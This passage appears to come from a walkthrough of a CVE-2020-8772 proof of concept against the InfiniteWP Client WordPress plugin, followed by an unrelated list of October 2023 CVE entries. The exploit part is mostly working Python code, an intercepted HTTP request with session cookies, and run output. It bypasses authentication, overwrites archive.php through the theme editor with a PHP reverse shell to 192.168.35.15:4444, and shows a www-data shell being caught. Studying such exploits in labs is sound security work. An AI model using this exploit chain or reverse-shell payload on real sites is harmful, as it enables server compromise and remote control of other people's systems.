[+] Trying http://127.0.0.1:8000/wp-admin/ with IWP payload : _IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ==
  • Sends the IWP payload to /wp-admin/ as the admin user; the Session stores whatever Set-Cookie values come back
  • If the status code is not 200, the endpoint was not reached and the script exits
    • A 200 here is only a weak sanity check: requests follows redirects, so an unauthenticated /wp-admin/ would also end on the login page with a 200. Stage 2 is the real test, since theme-editor.php only renders for a logged-in administrator

getNonce

def getNonce(session, url, header, themeName):
    """
    Get Nonce and return Nonce 

    :return:nonce:str:Nonce of the theme-editor.php?file=archive.php 
    """

    # First, see if we can visit the theme-editor.php endpoint 
    urlFirst = url + '/wp-admin/theme-editor.php'
    print("[+] Trying " + urlFirst)

    try:
        res = session.get(urlFirst, headers=header)
        if res.status_code != 200:
            print("[-] Failed to reach endpoint")
            print(res.status_code)
            exit(1)
    except Exception as e:
        print("[-] Error occurred: Potential theme name problem - " + str(e))
        exit(1)
    

    # Second, retrieve the nonce from the page and return the nonce 
    urlSecond = url + '/wp-admin/theme-editor.php?file=archive.php&theme=' + themeName
    print("[+] Trying " + urlSecond)

    try:
        res = session.get(urlSecond, headers=header)
        if res.status_code != 200:
            print("[-] Failed to reach endpoint")
            print(res.status_code)
            exit(1)
    except Exception as e:
        print("[-] Error occurred: Potential theme name problem - " + str(e))
        exit(1)
    
    try:
        soup = BeautifulSoup(res.text, features='lxml')
        nonce = soup.find_all(id='_wpnonce')[0].get('value')
        print("[DEBUG] Nonce = ", nonce)
    except Exception as e:
        print('[-] Error occurred: Potential username problem - ' + str(e))
        exit(1)

    return nonce
[+] Stage2: Getting Nonce
[+] Trying http://127.0.0.1:8000/wp-admin/theme-editor.php
[+] Trying http://127.0.0.1:8000/wp-admin/theme-editor.php?file=archive.php&theme=twentyseventeen
[DEBUG] Nonce =  f6da1de574
  • http://127.0.0.1:8000/wp-admin/theme-editor.php?file=archive.php&theme=twentyseventeen
    • Capturing the visit to this page with the admin user's cookies in Burp Suite shows
      • a _wpnonce value in the editor form; this is WordPress's CSRF token for the update action (despite the name it is not single-use and stays valid for a number of hours), and theme-editor.php refuses an update without it
    • The nonce is collected for the next stage

injectPayload

def injectPayload(session, url, header, nonce, payload, themeName):
    """
    Inject the php payload into archive.php 

    :return:bool:True/False based on successfully injecting php payload 
    """
    url = url + "/wp-admin/theme-editor.php"
    payloadData = {"_wpnonce": nonce, "newcontent": payload, "action": "update", "file": "archive.php", "theme": themeName, "scrollto": "0", "docs-list": '', "submit": "Update File"}

    print("[+] Trying " + url)
    print("[+] Full Payload : ", payloadData)

    try:
        res = session.post(url, headers=header, data=payloadData)
        if res.status_code != 200:
            print("[-] Failed to reach endpoint")
            print(res.status_code)
            exit(1)
    except Exception as e:
        print("[-] Error occurred: " + str(e))
        exit(1)

    return True
  • Overwrites archive.php with the payload through theme-editor.php
POST /wp-admin/theme-editor.php HTTP/1.1
Host: localhost:8000
Content-Length: 125362
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8000/wp-admin/theme-editor.php
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1694539956%7CI4n7dZOgnfQ2y32hhLTnBMm37cwqfwCWUWKANbRRGKr%7Cf7af4fbb3032c9c291419a2c7aa6610038a1c920f83ec0c31aac92374ebdac0b; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1694539956%7CI4n7dZOgnfQ2y32hhLTnBMm37cwqfwCWUWKANbRRGKr%7C317e7700cadefeb3c65235c55650ee0e358222791c6a70ceb2520a406b4b0a44; wp-settings-time-1=1694367175
Connection: close

_wpnonce=bdddcebdd9&_wp_http_referer=%2Fwp-admin%2Ftheme-editor.php&newcontent=%2F*%0D%0ATheme+Name%3A+Twenty+Seventeen%0D%0ATheme+URI%3A+https%3A%2F%2Fwordpress.org%2Fthemes%2Ftwentyseventeen%2F%0D%0AAuthor%3A+the+WordPress+team%0D%0AAuthor+URI%3A+https%3A%2F%2Fwordpress.org%2F%0D%0ADescription%3A+Twenty+Seventeen+brings+your+site+to+life+with+header+video+and+immersive+featured+images.+With+a+focus+on+business+sites%2C+it+features+multiple+sections+on+the+front+page+as+well+as+widgets%2C+navigation+and+social+menus%2C+a+logo%2C+and+more.+Personalize+its+asymmetrical+grid+with+a+custom+color+scheme+and+showcase+your+multimedia+content+with+post+formats.+Our+default+theme+for+2017+works+great+in+many+languages%2C+for+any+abilities%2C+and+on+any+device.%0D%0AVersion%3A+1.3%0D%0ALicense%3A+GNU+General+Public+License+v2+or+later%0D%0ALicense+URI%3A+http%3A%2F%2Fwww.gnu.org%2Flicenses%2Fgpl-2.0.html%0D%0AText+Domain%3A+twentyseventeen%0D%
...................................
...................................
...................................
ned+with+others.%0D%0A*%2F%0D%0A%0D%0A%2F*--------------------------------------------------------------%0D%0A%3E%3E%3E+TABLE+OF+CONTENTS%3A%0D%0A------------ant%3B+%2F*+Make+sure+color+schemes+don%27t+affect+to+print+*%2F%0D%0A%09%7D%0D%0A%0D%0A%09h2%2C%0D%0A%09h5%2C%0D%0A%09blockquote%2C%0D%0A%09.site-description%2C%0D%0A%09.twentyseventeen-front-page.has-header-image+.site-description%2C%0D%0A%09.twentyseventeen-front-page.has-header-video+.site-description%2C%0D%0A%09.entry-meta%2C%0D%0A%09.entry-meta+a+%7B%0D%0A%09%09color%3A+%23777+%21important%3B+%2F*+Make+sure+color+schemes+don%27t+affect+to+print+*%2F%0D%0A%09%7D%0D%0A%0D%0A%09.entry-content+blockquote.alignleft%2C%0D%0A%09.entry-content+blockquote.alignright+%7B%0D%0A%09%09font-size%3A+11pt%3B%0D%0A%09%09width%3A+34%25%3B%0D%0A%09%7D%0D%0A%0D%0A%09.site-footer+%7B%0D%0A%09%09padding%3A+0%3B%0D%0A%09%7D%0D%0A%7D%0D%0A&action=update&file=style.css&theme=twentyseventeen&scrollto=400&submit=%ED%8C%8C%EC%9D%BC+%EC%97%85%EB%8D%B0%EC%9D%B4%ED%8A%B8
  • Capturing a theme file update from the WordPress admin page in Burp Suite shows the following (this capture is of style.css; the exploit sends the same form for archive.php)
    • _wpnonce carries the nonce value
    • newcontent carries the new contents of the file being edited
    • action=update says the file is to be updated
    • file selects the file to change
    • theme carries the name of the current theme
    • scrollto restores the editor scroll position (400 here)
    • submit is the button label ("파일 업데이트", URL-encoded Korean for "Update File")

Running the PoC

ncat -lvnp 4444
python .\cve-2020-8772.py -u http://127.0.0.1:8000 -n admin -t twentyseventeen
[DEBUG] baseUrl -  http://127.0.0.1:8000
[DEBUG] username -  admin
[DEBUG] themeName -  twentyseventeen
[DEBUG] Payload -  <?php exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.35.15/4444 0>&1'");
[DEBUG] (Make sure to change the payload)

[+] Stage1: IWP Exploit & Sanity Check
[+] Trying http://127.0.0.1:8000/wp-admin/ with IWP payload : _IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ==

[+] Stage2: Getting Nonce
[+] Trying http://127.0.0.1:8000/wp-admin/theme-editor.php
[+] Trying http://127.0.0.1:8000/wp-admin/theme-editor.php?file=archive.php&theme=twentyseventeen
[DEBUG] Nonce =  1cfc1aea53

[+] Stage3: Injecting Payload into archive.php
[+] Trying http://127.0.0.1:8000/wp-admin/theme-editor.php
[+] Full Payload :  {'_wpnonce': '1cfc1aea53', 'newcontent': '<?php exec("/bin/bash -c \'bash -i > /dev/tcp/192.168.35.15/4444 0>&1\'");', 'action': 'update', 'file': 'archive.php', 'theme': 'twentyseventeen', 'scrollto': '0', 'docs-list': '', 'submit': 'Update File'}

[+] Exploitation Successful. Open up netcat listener & Visit the following URL

[+] Visit -->  http://127.0.0.1:8000/wp-content/themes/twentyseventeen/archive.php
 ncat -lvnp 4444
Ncat: Version 7.94 ( <https://nmap.org/ncat> )
Ncat: Listening on [::]:4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.35.15:13159.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

 

datetime subject id link
2023-10-19 00:05:02.369554 (Remote Attack, PHP, XSS) CVE-2023-5631 https://cve.report/CVE-2023-5631
2023-10-19 00:05:02.430424 (XSS) CVE-2023-30781 https://cve.report/CVE-2023-30781
2023-10-19 00:05:02.443731 (XSS) CVE-2023-45632 https://cve.report/CVE-2023-45632
2023-10-19 00:05:02.457371 (XSS) CVE-2023-45630 https://cve.report/CVE-2023-45630
2023-10-19 00:05:02.470955 (XSS) CVE-2023-45628 https://cve.report/CVE-2023-45628
2023-10-19 00:05:02.534317 (WordPress, XSS) CVE-2023-45607 https://cve.report/CVE-2023-45607
2023-10-19 00:05:02.547502 (XSS) CVE-2023-45604 https://cve.report/CVE-2023-45604
2023-10-19 00:05:02.560528 (XSS) CVE-2023-45602 https://cve.report/CVE-2023-45602
2023-10-19 02:05:02.930560 (Remote Attack) CVE-2023-20261 https://cve.report/CVE-2023-20261
2023-10-19 02:05:02.944207 (Path Traversal) CVE-2023-45383 https://cve.report/CVE-2023-45383
2023-10-19 02:05:02.959747 (Remote Attack) CVE-2023-5642 https://cve.report/CVE-2023-5642
2023-10-19 07:05:02.381506 (redis) CVE-2023-45145 https://cve.report/CVE-2023-45145
2023-10-19 08:05:02.624003 (File Upload) CVE-2023-37502 https://cve.report/CVE-2023-37502
2023-10-19 08:05:02.637253 (PHP, XSS) CVE-2023-45958 https://cve.report/CVE-2023-45958
2023-10-19 08:05:02.650865 (Remote Code Execution, Execute Arbitrary code) CVE-2023-45146 https://cve.report/CVE-2023-45146
2023-10-19 12:05:02.585574 (WordPress) CVE-2023-4645 https://cve.report/CVE-2023-4645
2023-10-19 16:05:02.848190 (WordPress, PHP, Critical) CVE-2023-5241 https://cve.report/CVE-2023-5241
2023-10-19 18:05:02.988422 (GitHub) CVE-2023-25753 https://cve.report/CVE-2023-25753
2023-10-19 20:05:02.052134 (GitHub) CVE-2023-46227 https://cve.report/CVE-2023-46227
2023-10-19 22:05:02.266043 (XSS) CVE-2022-37830 https://cve.report/CVE-2022-37830
2023-10-19 23:05:02.976948 (PHP) CVE-2023-45384 https://cve.report/CVE-2023-45384
2023-10-19 23:05:03.029931 (SQL injection) CVE-2023-45379 https://cve.report/CVE-2023-45379
datetime subject id link
2023-10-18 00:05:03.378890 (Execute Arbitrary code) CVE-2023-43959 https://cve.report/CVE-2023-43959
2023-10-18 06:05:02.425570 (PHP, File Upload, Execute Arbitrary code) CVE-2023-45952 https://cve.report/CVE-2023-45952
2023-10-18 06:05:02.438759 (PHP, SQL injection) CVE-2023-45951 https://cve.report/CVE-2023-45951
2023-10-18 07:05:02.762932 (Path Traversal) CVE-2023-41629 https://cve.report/CVE-2023-41629
2023-10-18 07:05:02.825968 (SQL injection) CVE-2023-43794 https://cve.report/CVE-2023-43794
2023-10-18 08:05:02.564205 (MySQL, SQL Server, SQL Server) CVE-2023-22070 https://cve.report/CVE-2023-22070
2023-10-18 08:05:02.626612 (MySQL, SQL Server, SQL Server) CVE-2023-22068 https://cve.report/CVE-2023-22068
2023-10-18 08:05:02.640127 (MySQL, SQL Server, SQL Server) CVE-2023-22066 https://cve.report/CVE-2023-22066
2023-10-18 08:05:02.653633 (MySQL, SQL Server, SQL Server) CVE-2023-22065 https://cve.report/CVE-2023-22065
2023-10-18 08:05:02.666805 (MySQL, SQL Server, SQL Server) CVE-2023-22064 https://cve.report/CVE-2023-22064
2023-10-18 08:05:02.734239 (MySQL, SQL Server, SQL Server) CVE-2023-22059 https://cve.report/CVE-2023-22059
2023-10-18 08:05:02.753353 (MySQL, SQL Server, SQL Server) CVE-2023-22032 https://cve.report/CVE-2023-22032
2023-10-18 08:05:02.766778 (MySQL, SQL Server, SQL Server) CVE-2023-22028 https://cve.report/CVE-2023-22028
2023-10-18 08:05:02.824703 (MySQL, SQL Server, SQL Server) CVE-2023-22026 https://cve.report/CVE-2023-22026
2023-10-18 08:05:02.842649 (Critical) CVE-2023-22019 https://cve.report/CVE-2023-22019
2023-10-18 08:05:02.859249 (MySQL, SQL Server, SQL Server) CVE-2023-22015 https://cve.report/CVE-2023-22015
2023-10-18 08:05:02.872881 (Remote Code Execution, File Upload) CVE-2023-41631 https://cve.report/CVE-2023-41631
2023-10-18 08:05:02.930966 (Remote Code Execution) CVE-2023-41630 https://cve.report/CVE-2023-41630
2023-10-18 09:05:03.224236 (MySQL, SQL Server, SQL Server) CVE-2023-22092 https://cve.report/CVE-2023-22092
2023-10-18 09:05:03.238033 (Critical) CVE-2023-22090 https://cve.report/CVE-2023-22090
2023-10-18 09:05:03.253525 (Critical) CVE-2023-22086 https://cve.report/CVE-2023-22086
2023-10-18 09:05:03.266802 (MySQL, SQL Server, SQL Server) CVE-2023-22084 https://cve.report/CVE-2023-22084
2023-10-18 09:05:03.333603 (MySQL, SQL Server, SQL Server) CVE-2023-22079 https://cve.report/CVE-2023-22079
2023-10-18 09:05:03.348089 (MySQL, SQL Server, SQL Server) CVE-2023-22078 https://cve.report/CVE-2023-22078
2023-10-18 10:05:03.026822 (MySQL, SQL Server, SQL Server) CVE-2023-22113 https://cve.report/CVE-2023-22113
2023-10-18 10:05:03.050065 (MySQL, SQL Server, SQL Server) CVE-2023-22112 https://cve.report/CVE-2023-22112
2023-10-18 10:05:03.067647 (MySQL, SQL Server, SQL Server) CVE-2023-22111 https://cve.report/CVE-2023-22111
2023-10-18 10:05:03.126402 (MySQL, SQL Server, SQL Server) CVE-2023-22110 https://cve.report/CVE-2023-22110
2023-10-18 10:05:03.144247 (Critical) CVE-2023-22108 https://cve.report/CVE-2023-22108
2023-10-18 10:05:03.161312 (Critical) CVE-2023-22106 https://cve.report/CVE-2023-22106
2023-10-18 10:05:03.177172 (MySQL, SQL Server, SQL Server) CVE-2023-22104 https://cve.report/CVE-2023-22104
2023-10-18 10:05:03.233245 (MySQL, SQL Server, SQL Server) CVE-2023-22103 https://cve.report/CVE-2023-22103
2023-10-18 10:05:03.246451 (MySQL) CVE-2023-22102 https://cve.report/CVE-2023-22102
2023-10-18 10:05:03.259600 (Critical) CVE-2023-22100 https://cve.report/CVE-2023-22100
2023-10-18 10:05:03.272810 (MySQL, SQL Server, SQL Server) CVE-2023-22097 https://cve.report/CVE-2023-22097
2023-10-18 10:05:03.334395 (MySQL, SQL Server, SQL Server) CVE-2023-22095 https://cve.report/CVE-2023-22095
2023-10-18 10:05:03.347464 (MySQL, SQL Server, Critical, SQL Server) CVE-2023-22094 https://cve.report/CVE-2023-22094
2023-10-18 11:05:02.279292 (GitHub, XSS) CVE-2023-3042 https://cve.report/CVE-2023-3042
2023-10-18 11:05:02.335243 (Critical) CVE-2023-22122 https://cve.report/CVE-2023-22122
2023-10-18 11:05:02.349376 (Critical) CVE-2023-22119 https://cve.report/CVE-2023-22119
2023-10-18 11:05:02.363217 (MySQL, SQL Server, SQL Server) CVE-2023-22115 https://cve.report/CVE-2023-22115
2023-10-18 11:05:02.427544 (MySQL, SQL Server, SQL Server) CVE-2023-22114 https://cve.report/CVE-2023-22114
2023-10-18 14:05:07.282531 (Grafana) CVE-2023-4822 https://cve.report/CVE-2023-4822
2023-10-18 15:05:02.376789 (Remote Attack, GraphQL) CVE-2023-42319 https://cve.report/CVE-2023-42319
2023-10-18 15:05:02.433429 (GitHub) CVE-2023-5626 https://cve.report/CVE-2023-5626
2023-10-18 18:05:02.374319 (XSS) CVE-2023-45049 https://cve.report/CVE-2023-45049
2023-10-18 18:05:02.435102 (XSS) CVE-2023-45008 https://cve.report/CVE-2023-45008
2023-10-18 18:05:02.453016 (XSS) CVE-2023-25476 https://cve.report/CVE-2023-25476
2023-10-18 18:05:02.468077 (WordPress) CVE-2023-4938 https://cve.report/CVE-2023-4938
2023-10-18 19:05:02.853413 (XSS) CVE-2023-45064 https://cve.report/CVE-2023-45064
2023-10-18 19:05:02.866717 (XSS) CVE-2023-45062 https://cve.report/CVE-2023-45062
2023-10-18 19:05:02.927849 (XSS) CVE-2023-45059 https://cve.report/CVE-2023-45059
2023-10-18 19:05:02.940687 (XSS) CVE-2023-45057 https://cve.report/CVE-2023-45057
2023-10-18 19:05:02.953790 (XSS) CVE-2023-45056 https://cve.report/CVE-2023-45056
2023-10-18 19:05:02.966891 (XSS) CVE-2023-45054 https://cve.report/CVE-2023-45054
2023-10-18 19:05:03.030561 (XSS) CVE-2023-45051 https://cve.report/CVE-2023-45051
2023-10-18 20:05:02.177103 (XXE) CVE-2023-45727 https://cve.report/CVE-2023-45727
2023-10-18 22:05:03.007197 (XSS) CVE-2023-32089 https://cve.report/CVE-2023-32089
2023-10-18 22:05:03.046960 (XSS) CVE-2023-32088 https://cve.report/CVE-2023-32088
2023-10-18 22:05:03.066512 (XSS) CVE-2023-32087 https://cve.report/CVE-2023-32087
2023-10-18 23:05:02.268586 (XSS) CVE-2023-45608 https://cve.report/CVE-2023-45608
2023-10-18 23:05:02.330239 (XSS) CVE-2023-45073 https://cve.report/CVE-2023-45073
2023-10-18 23:05:02.344664 (XSS) CVE-2023-45072 https://cve.report/CVE-2023-45072
2023-10-18 23:05:02.357681 (XSS) CVE-2023-45071 https://cve.report/CVE-2023-45071
2023-10-18 23:05:02.370407 (XSS) CVE-2023-45070 https://cve.report/CVE-2023-45070
2023-10-18 23:05:02.433984 (WordPress, XSS) CVE-2023-45067 https://cve.report/CVE-2023-45067
2023-10-18 23:05:02.450777 (XSS) CVE-2023-45065 https://cve.report/CVE-2023-45065
2023-10-18 23:05:02.463679 (XSS) CVE-2023-31217 https://cve.report/CVE-2023-31217
datetime subject id link
2023-10-17 01:05:03.688204 (Cisco IOS) CVE-2023-20198 https://cve.report/CVE-2023-20198
2023-10-17 03:05:02.751282 (Path Traversal) CVE-2023-45689 https://cve.report/CVE-2023-45689
2023-10-17 03:05:02.764314 (Path Traversal) CVE-2023-45688 https://cve.report/CVE-2023-45688
2023-10-17 03:05:02.826215 (Path Traversal) CVE-2023-45686 https://cve.report/CVE-2023-45686
2023-10-17 03:05:02.838895 (Path Traversal) CVE-2023-45685 https://cve.report/CVE-2023-45685
2023-10-17 05:05:02.962247 (GraphQL) CVE-2023-40180 https://cve.report/CVE-2023-40180
2023-10-17 05:05:02.979678 (GitHub, XSS) CVE-2023-45683 https://cve.report/CVE-2023-45683
2023-10-17 05:05:03.036032 (Spring Security) CVE-2023-45669 https://cve.report/CVE-2023-45669
2023-10-17 05:05:03.055329 (redis, memcached) CVE-2023-45148 https://cve.report/CVE-2023-45148
2023-10-17 07:05:03.474322 (redis) CVE-2023-43119 https://cve.report/CVE-2023-43119
2023-10-17 08:05:04.174349 (Remote Attack) CVE-2023-45542 https://cve.report/CVE-2023-45542
2023-10-17 08:05:04.234208 (Remote Code Execution, XSS) CVE-2023-45144 https://cve.report/CVE-2023-45144
2023-10-17 08:05:04.248093 (PHP, SQL injection) CVE-2023-40852 https://cve.report/CVE-2023-40852
2023-10-17 08:05:04.261946 (PHP, XSS) CVE-2023-40851 https://cve.report/CVE-2023-40851
2023-10-17 10:05:03.271864 (Remote Attack) CVE-2022-22377 https://cve.report/CVE-2022-22377
2023-10-17 10:05:03.329291 (Kibana, ElasticSearch, OpenSearch) CVE-2023-45807 https://cve.report/CVE-2023-45807
2023-10-17 10:05:03.349374 (Remote Attack) CVE-2023-45540 https://cve.report/CVE-2023-45540
2023-10-17 10:05:03.362780 (PHP) CVE-2023-44394 https://cve.report/CVE-2023-44394
2023-10-17 10:05:03.377043 (nginx) CVE-2023-44388 https://cve.report/CVE-2023-44388
2023-10-17 10:05:03.435670 (XSS) CVE-2023-43658 https://cve.report/CVE-2023-43658
2023-10-17 11:05:03.441641 (Arbitrary Command) CVE-2022-22375 https://cve.report/CVE-2022-22375
2023-10-17 12:05:02.490172 (Remote Attack) CVE-2022-22386 https://cve.report/CVE-2022-22386
2023-10-17 13:05:02.929240 (Remote Attack) CVE-2022-43891 https://cve.report/CVE-2022-43891
2023-10-17 14:05:02.761925 (Path Traversal) CVE-2023-34208 https://cve.report/CVE-2023-34208
2023-10-17 15:05:03.665566 (PHP, SQL injection) CVE-2023-44693 https://cve.report/CVE-2023-44693
2023-10-17 15:05:03.727697 (SQL injection) CVE-2023-45386 https://cve.report/CVE-2023-45386
2023-10-17 15:05:03.740670 (SQL injection) CVE-2023-45375 https://cve.report/CVE-2023-45375
2023-10-17 15:05:03.753538 (XSS) CVE-2023-45358 https://cve.report/CVE-2023-45358
2023-10-17 15:05:03.766660 (SQL injection) CVE-2023-34210 https://cve.report/CVE-2023-34210
2023-10-17 16:05:03.671309 (PHP, SQL injection) CVE-2023-44694 https://cve.report/CVE-2023-44694
2023-10-17 17:05:03.776232 (Remote Attack) CVE-2023-4089 https://cve.report/CVE-2023-4089
2023-10-17 18:05:03.035111 (XSS) CVE-2023-24385 https://cve.report/CVE-2023-24385
2023-10-17 18:05:03.054871 (Remote Attack, XSS) CVE-2023-42497 https://cve.report/CVE-2023-42497
2023-10-17 18:05:03.070022 (Grafana) CVE-2023-4399 https://cve.report/CVE-2023-4399
2023-10-17 19:05:02.564705 (Remote Attack, XSS) CVE-2023-44310 https://cve.report/CVE-2023-44310
2023-10-17 19:05:02.627373 (Remote Attack, XSS) CVE-2023-44309 https://cve.report/CVE-2023-44309
2023-10-17 19:05:02.653671 (Remote Attack, XSS) CVE-2023-42629 https://cve.report/CVE-2023-42629
2023-10-17 20:05:02.530875 (XSS) CVE-2023-45005 https://cve.report/CVE-2023-45005
2023-10-17 20:05:02.549641 (WordPress, XSS) CVE-2023-44990 https://cve.report/CVE-2023-44990
2023-10-17 20:05:02.565540 (Remote Attack, XSS) CVE-2023-44311 https://cve.report/CVE-2023-44311
2023-10-17 21:05:03.662319 (XSS) CVE-2023-45010 https://cve.report/CVE-2023-45010
2023-10-17 21:05:03.679348 (XSS) CVE-2023-45003 https://cve.report/CVE-2023-45003
2023-10-17 22:05:02.865791 (Remote Attack, XSS) CVE-2023-42627 https://cve.report/CVE-2023-42627
2023-10-17 22:05:02.927111 (XSS) CVE-2023-45007 https://cve.report/CVE-2023-45007
2023-10-17 22:05:02.940078 (XSS) CVE-2023-45006 https://cve.report/CVE-2023-45006
2023-10-17 22:05:02.952822 (XSS) CVE-2023-45004 https://cve.report/CVE-2023-45004
2023-10-17 22:05:02.965618 (Remote Attack, XSS) CVE-2023-42628 https://cve.report/CVE-2023-42628
2023-10-17 23:05:02.670337 (PHP, File Upload, Execute Arbitrary code) CVE-2023-44824 https://cve.report/CVE-2023-44824
datetime subject id link
2023-10-16 08:05:02.855311 (Path Traversal) CVE-2023-5588 https://cve.report/CVE-2023-5588
2023-10-16 09:05:02.965428 (Remote Attack, XSS) CVE-2022-48612 https://cve.report/CVE-2022-48612
2023-10-16 09:05:03.028933 (GitHub) CVE-2023-5590 https://cve.report/CVE-2023-5590
2023-10-16 11:05:02.673854 (GitHub, SQL injection) CVE-2023-5591 https://cve.report/CVE-2023-5591
2023-10-16 16:05:02.477038 (Command Injection, Remote Code Execution) CVE-2023-21413 https://cve.report/CVE-2023-21413
2023-10-16 16:05:02.528606 (Remote Attack, Execute Arbitrary code) CVE-2023-45575 https://cve.report/CVE-2023-45575
2023-10-16 16:05:02.547090 (Remote Attack, Execute Arbitrary code) CVE-2023-45574 https://cve.report/CVE-2023-45574
2023-10-16 16:05:02.562597 (Remote Attack, Execute Arbitrary code) CVE-2023-45573 https://cve.report/CVE-2023-45573
2023-10-16 16:05:02.575855 (Remote Attack, Execute Arbitrary code) CVE-2023-45572 https://cve.report/CVE-2023-45572
2023-10-16 16:05:02.633264 (Command Injection) CVE-2023-36954 https://cve.report/CVE-2023-36954
2023-10-16 16:05:02.646384 (Command Injection) CVE-2023-36953 https://cve.report/CVE-2023-36953
2023-10-16 17:05:03.661926 (Command Injection) CVE-2023-45158 https://cve.report/CVE-2023-45158
2023-10-16 17:05:03.725513 (Remote Attack, Execute Arbitrary code) CVE-2023-45580 https://cve.report/CVE-2023-45580
2023-10-16 17:05:03.738342 (Remote Attack, Execute Arbitrary code) CVE-2023-45579 https://cve.report/CVE-2023-45579
2023-10-16 17:05:03.750847 (Remote Attack, Execute Arbitrary code) CVE-2023-45578 https://cve.report/CVE-2023-45578
2023-10-16 17:05:03.763266 (Remote Attack, Execute Arbitrary code) CVE-2023-45577 https://cve.report/CVE-2023-45577
2023-10-16 17:05:03.826645 (Remote Attack, Execute Arbitrary code) CVE-2023-45576 https://cve.report/CVE-2023-45576
2023-10-16 17:05:03.839137 (Path Traversal) CVE-2023-21415 https://cve.report/CVE-2023-21415
2023-10-16 19:05:02.626868 (GitHub, SQL injection) CVE-2023-43667 https://cve.report/CVE-2023-43667
2023-10-16 19:05:02.640837 (GitHub) CVE-2023-43666 https://cve.report/CVE-2023-43666
2023-10-16 19:05:02.655234 (GitHub) CVE-2023-5595 https://cve.report/CVE-2023-5595
2023-10-16 19:05:02.668780 (OpenSSL) CVE-2023-5422 https://cve.report/CVE-2023-5422
2023-10-16 19:05:02.728962 (GitHub, XSS) CVE-2023-45757 https://cve.report/CVE-2023-45757
2023-10-16 19:05:02.743374 (Critical) CVE-2023-4834 https://cve.report/CVE-2023-4834
2023-10-16 20:05:02.847111 (GitHub) CVE-2023-43668 https://cve.report/CVE-2023-43668
2023-10-16 21:05:03.274378 (XSS) CVE-2023-44987 https://cve.report/CVE-2023-44987
2023-10-16 21:05:03.338767 (XSS) CVE-2023-44986 https://cve.report/CVE-2023-44986
2023-10-16 21:05:03.353271 (XSS) CVE-2023-44985 https://cve.report/CVE-2023-44985
2023-10-16 21:05:03.366353 (XSS) CVE-2023-44984 https://cve.report/CVE-2023-44984
2023-10-16 21:05:03.425440 (XSS) CVE-2023-44229 https://cve.report/CVE-2023-44229
2023-10-16 22:05:03.168147 (Grafana) CVE-2023-4457 https://cve.report/CVE-2023-4457
2023-10-16 22:05:03.228669 (Command Injection, Command Execution, Arbitrary Command) CVE-2023-3991 https://cve.report/CVE-2023-3991
2023-10-16 22:05:03.242429 (XSS) CVE-2023-46066 https://cve.report/CVE-2023-46066
datetime subject id link
2023-10-15 01:05:02.651027 (Remote Attack) CVE-2022-33165 https://cve.report/CVE-2022-33165
2023-10-15 01:05:02.666482 (Remote Attack) CVE-2022-33161 https://cve.report/CVE-2022-33161
2023-10-15 01:05:02.679222 (Remote Attack, XXE) CVE-2022-32755 https://cve.report/CVE-2022-32755
2023-10-15 02:05:02.742148 (IBM QRadar) CVE-2023-30994 https://cve.report/CVE-2023-30994
2023-10-15 03:05:02.181191 (IBM QRadar) CVE-2023-40367 https://cve.report/CVE-2023-40367
2023-10-15 11:05:03.671589 (GitHub) CVE-2023-5586 https://cve.report/CVE-2023-5586
datetime subject id link
2023-10-14 00:05:03.375535 (XSS) CVE-2023-45391 https://cve.report/CVE-2023-45391
2023-10-14 01:05:03.525285 (Path Traversal) CVE-2023-41682 https://cve.report/CVE-2023-41682
2023-10-14 06:05:03.048451 (XSS) CVE-2023-34977 https://cve.report/CVE-2023-34977
2023-10-14 06:05:03.063162 (SQL injection) CVE-2023-34976 https://cve.report/CVE-2023-34976
2023-10-14 06:05:03.131077 (SQL injection) CVE-2023-34975 https://cve.report/CVE-2023-34975
2023-10-14 06:05:03.150224 (Command Injection) CVE-2023-32976 https://cve.report/CVE-2023-32976
2023-10-14 06:05:03.168753 (Path Traversal) CVE-2023-32974 https://cve.report/CVE-2023-32974
2023-10-14 09:05:03.449922 (SQL injection) CVE-2023-45674 https://cve.report/CVE-2023-45674
2023-10-14 12:05:03.069246 (Arbitrary Command) CVE-2023-45852 https://cve.report/CVE-2023-45852
2023-10-14 13:05:02.356897 (PHP, XSS) CVE-2023-30148 https://cve.report/CVE-2023-30148
2023-10-14 14:05:02.867539 (Remote Attack, PHP, SQL injection) CVE-2023-30154 https://cve.report/CVE-2023-30154
2023-10-14 15:05:02.366346 (Command Injection, Command Execution) CVE-2023-26155 https://cve.report/CVE-2023-26155
2023-10-14 15:05:02.429813 (Remote Code Execution, PHP) CVE-2023-45856 https://cve.report/CVE-2023-45856
2023-10-14 15:05:02.455109 (Remote Attack) CVE-2023-44037 https://cve.report/CVE-2023-44037
2023-10-14 18:05:05.156211 (Path Traversal) CVE-2023-39332 https://cve.report/CVE-2023-39332
2023-10-14 18:05:05.169522 (Path Traversal) CVE-2023-39331 https://cve.report/CVE-2023-39331
2023-10-14 20:05:07.663803 (PHP) CVE-2023-5578 https://cve.report/CVE-2023-5578
datetime subject id link
2023-10-13 02:05:02.526259 (PHP) CVE-2023-43147 https://cve.report/CVE-2023-43147
2023-10-13 03:05:02.642400 (Remote Code Execution, Critical) CVE-2023-45138 https://cve.report/CVE-2023-45138
2023-10-13 04:05:03.462388 (Vmware) CVE-2023-27312 https://cve.report/CVE-2023-27312
